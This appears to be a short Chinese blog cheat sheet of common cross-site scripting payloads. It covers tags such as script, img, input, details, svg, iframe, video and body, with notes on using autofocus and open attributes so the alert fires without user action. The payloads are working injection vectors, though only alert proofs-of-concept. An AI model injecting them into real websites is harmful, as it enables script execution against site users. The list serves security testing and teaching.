XSS常用标签

目录

XSS常用标签

< script >

< img >

< input >

< details >

< svg >

< select >

< iframe >

< video >

< audio >

< body >


XSS常用标签

<script> alert("xss"); </script>

<img src=1 onerror=alert("xss");>

<input onfocus="alert('xss');">    
//竞争焦点,从而触发onbiur事件
<input onblur=alert('xss') autofocus><input autofocus>    
//通过 autofocus 属性执行本身的focus事件,这个向量是使焦点自动跳转到输入元素上,触发焦点事件,无需用户去触发
<input onfocus="alert('xss');"autofocus>

<details ontoggle="alert('xss');"></details>
// 使用open属性触发ontoggle事件,无需用户去触发
<details open ontoggle="alert('xss');"></details>

<svg onload="alert('xss')"></svg>>

<select onfocus=alert('xss')></select>
// 通过autofocus 属性执行本身的focus事件,这个向量是使焦点自动跳转到输入元素上,触发焦点事件,无需用户去触发
<select onfocus="alert('xss')" autofocus></select>

<iframe onload=alert("xss");></iframe>

<video><source onerror="alert('xss')"></video>

<audio src="x" onerror=alert('xss');></audio>

<body onload=alert('xss');></body>

利用换行符以及 autofocus ,自动取触发 onscroll 事件,无需用户去触发。

 

< script >

<!doctype html>
<html>
<head>
    <meta charset="utf-8">
    <title> This is a Test </title>
</head>

<body>

    <script>alert("This is a test about xss !");</script>

</body>
</html>

< img >

 

< input >

< details >

 

 

< svg >

 

< select >

 

< iframe >

 

< video >

 

< audio >

 

< body >

 

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值